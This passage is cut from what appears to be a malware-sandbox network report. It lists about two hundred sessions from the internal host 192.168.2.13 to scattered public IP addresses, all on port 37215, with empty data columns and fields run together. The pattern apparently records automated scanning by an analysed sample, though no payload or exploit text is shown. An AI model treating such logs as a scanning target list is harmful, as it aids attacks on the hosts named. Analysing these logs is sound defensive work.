                                                  16828192.168.2.1357400157.44.180.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16829192.168.2.1359040197.31.189.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16830192.168.2.1354816197.25.222.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16831192.168.2.1337480157.109.197.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16832192.168.2.136013041.250.16.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16833192.168.2.1337984115.201.244.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16834192.168.2.134451241.62.18.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16835192.168.2.1350106157.168.223.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16836192.168.2.1347966157.99.237.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16837192.168.2.1357952157.125.159.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16838192.168.2.134538641.144.229.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16839192.168.2.1336790168.29.76.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16840192.168.2.135924051.35.37.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16841192.168.2.135040277.178.33.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16842192.168.2.1355094201.109.18.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16843192.168.2.1348212197.31.103.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16844192.168.2.134827841.237.69.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16845192.168.2.1334056194.247.89.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16846192.168.2.136078041.214.119.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16847192.168.2.1360788192.196.79.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16848192.168.2.1355848157.48.37.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16849192.168.2.134822041.196.148.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16850192.168.2.1348080157.64.68.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16851192.168.2.1332972197.25.84.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16852192.168.2.133737241.139.27.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16853192.168.2.134584241.48.239.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16854192.168.2.1343684197.76.28.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16855192.168.2.134232092.44.51.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16856192.168.2.1355144157.238.117.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16857192.168.2.1356538223.117.43.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16858192.168.2.136034893.9.99.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16859192.168.2.134296813.77.74.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16860192.168.2.1350162157.138.83.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16861192.168.2.1351200157.123.189.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16862192.168.2.1347864197.181.59.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16863192.168.2.1351484157.83.168.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16864192.168.2.136076441.233.123.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16865192.168.2.1346354157.116.27.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16866192.168.2.1337962197.20.105.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16867192.168.2.134320841.113.42.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16868192.168.2.1360864157.191.19.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16869192.168.2.1355506167.3.202.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16870192.168.2.1342480197.32.108.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16871192.168.2.134566041.192.240.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16872192.168.2.1352720133.143.224.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16873192.168.2.1348394197.218.168.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16874192.168.2.1344434197.21.128.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16875192.168.2.133895841.229.47.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16876192.168.2.134731641.249.52.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16877192.168.2.134367613.168.57.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16878192.168.2.135377041.160.144.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16879192.168.2.1339568197.105.60.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16880192.168.2.133799241.59.190.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16881192.168.2.134126041.81.247.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16882192.168.2.1339286157.161.133.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16883192.168.2.1343504157.151.87.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16884192.168.2.1345152197.80.19.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16885192.168.2.1348078197.182.81.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16886192.168.2.1333278205.185.124.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16887192.168.2.134928841.208.90.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16888192.168.2.1338532157.121.247.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16889192.168.2.1336210128.31.49.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16890192.168.2.1360814169.78.115.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16891192.168.2.1349724197.84.15.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16892192.168.2.1339578157.21.157.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16893192.168.2.1347316197.115.211.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16894192.168.2.1345280197.57.232.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16895192.168.2.1350406197.52.242.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16896192.168.2.1337512209.176.29.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16897192.168.2.1348066197.230.115.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16898192.168.2.1339836135.195.22.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16899192.168.2.1333194113.182.33.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16900192.168.2.1338618197.127.47.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16901192.168.2.134640241.78.50.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16902192.168.2.1359276204.71.11.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16903192.168.2.1339696175.220.120.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16904192.168.2.1345440157.188.58.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16905192.168.2.1342632197.86.16.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16906192.168.2.1343018125.160.224.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16907192.168.2.1348914197.254.102.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16908192.168.2.1352854197.23.251.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16909192.168.2.1353780157.249.181.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16910192.168.2.1356224157.7.182.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16911192.168.2.1344370157.133.207.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16912192.168.2.1342516157.45.153.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16913192.168.2.134932612.45.1.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16914192.168.2.1352050197.76.124.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16915192.168.2.133685041.65.187.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16916192.168.2.1344536157.177.72.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16917192.168.2.133638841.37.216.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16918192.168.2.1356208134.39.130.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16919192.168.2.1333126161.72.205.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16920192.168.2.134844241.253.81.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16921192.168.2.1359608197.112.209.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16922192.168.2.1355630197.254.255.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16923192.168.2.135800817.83.237.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16924192.168.2.1344588118.120.232.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16925192.168.2.1355922197.60.108.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16926192.168.2.134989841.192.187.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16927192.168.2.1360920157.200.240.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16928192.168.2.1355706197.13.3.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16929192.168.2.1346454157.16.211.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16930192.168.2.1347206157.162.126.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16931192.168.2.136006441.178.153.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16932192.168.2.133636241.255.254.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16933192.168.2.1354380223.102.107.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16934192.168.2.134704041.176.26.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16935192.168.2.133783041.80.249.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16936192.168.2.1342506197.204.77.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16937192.168.2.134146041.215.5.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16938192.168.2.13396848.155.129.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16939192.168.2.1340084197.171.33.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16940192.168.2.1334868197.20.10.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16941192.168.2.1359728197.195.160.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16942192.168.2.135407441.165.80.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16943192.168.2.1334780197.117.77.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16944192.168.2.134141441.74.122.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16945192.168.2.1350366197.199.82.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16946192.168.2.133743449.161.42.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16947192.168.2.1339842197.75.78.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16948192.168.2.1354678157.161.16.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16949192.168.2.1356370184.182.186.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16950192.168.2.1352430197.33.175.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16951192.168.2.1343676132.114.246.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16952192.168.2.1335976197.199.229.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16953192.168.2.1350590197.110.194.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16954192.168.2.1344202157.144.201.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16955192.168.2.1352684196.194.83.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16956192.168.2.136049470.76.251.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16957192.168.2.135240470.173.157.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16958192.168.2.135475641.43.3.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16959192.168.2.1349098157.180.69.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16960192.168.2.134791241.226.170.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16961192.168.2.1342416157.95.110.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16962192.168.2.1358210197.101.163.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16963192.168.2.1356622197.224.133.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16964192.168.2.1349340157.149.45.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16965192.168.2.134898041.206.87.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16966192.168.2.1358808197.152.153.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16967192.168.2.135387884.189.108.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16968192.168.2.135064047.159.209.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16969192.168.2.135916818.210.111.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16970192.168.2.134921471.46.4.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16971192.168.2.134058848.242.129.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16972192.168.2.1344748197.121.98.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16973192.168.2.134371641.66.234.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16974192.168.2.1346046157.219.210.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16975192.168.2.133278240.172.60.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16976192.168.2.134117041.106.243.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16977192.168.2.1357098157.214.34.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16978192.168.2.133719872.245.132.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16979192.168.2.134519254.222.121.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16980192.168.2.1355980197.34.12.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16981192.168.2.134539031.36.25.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16982192.168.2.1347912197.62.137.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16983192.168.2.135400641.199.114.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16984192.168.2.13573601.170.49.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16985192.168.2.1350536197.87.237.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16986192.168.2.1339578146.153.80.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16987192.168.2.1357984197.218.0.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16988192.168.2.1360462157.205.176.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16989192.168.2.1333052197.243.48.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16990192.168.2.133386441.45.39.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16991192.168.2.1347436197.138.7.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16992192.168.2.1357026197.205.131.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16993192.168.2.134596041.253.189.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16994192.168.2.133763641.227.180.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16995192.168.2.1338056157.254.135.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16996192.168.2.1344616212.121.222.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16997192.168.2.1334818132.29.151.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16998192.168.2.136044041.81.166.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16999192.168.2.1340516165.76.135.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17000192.168.2.1353578125.81.226.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17001192.168.2.1360514157.87.120.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17002192.168.2.135593641.216.16.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17003192.168.2.134438441.121.173.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17004192.168.2.133729841.129.167.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17005192.168.2.1348460217.178.72.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17006192.168.2.134350441.167.178.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17007192.168.2.1335956197.195.126.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17008192.168.2.1332836197.123.196.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17009192.168.2.1352114157.252.101.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17010192.168.2.1356096123.217.253.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17011192.168.2.1334310157.179.159.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17012192.168.2.1336764197.67.107.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17013192.168.2.1338208157.203.86.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17014192.168.2.133683841.22.61.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17015192.168.2.1347696197.62.34.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17016192.168.2.1334304157.164.253.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17017192.168.2.1348554197.65.155.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17018192.168.2.1334962157.155.98.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17019192.168.2.1338786167.224.69.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17020192.168.2.1349252197.248.140.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17021192.168.2.1340758179.124.149.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17022192.168.2.1340104157.2.208.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17023192.168.2.1336282197.61.197.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17024192.168.2.135228877.90.111.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17025192.168.2.1353342157.175.186.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17026192.168.2.1335758118.144.237.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17027192.168.2.1354358197.189.179.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17028192.168.2.1342956157.126.150.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17029192.168.2.1345948151.82.252.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17030192.168.2.1342652157.245.102.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17031192.168.2.1339394197.105.213.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17032192.168.2.1348648197.157.216.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17033192.168.2.1346968197.128.224.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17034192.168.2.133830241.151.157.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17035192.168.2.136087241.18.173.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17036192.168.2.1350386157.134.204.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17037192.168.2.1343902197.134.37.24637215
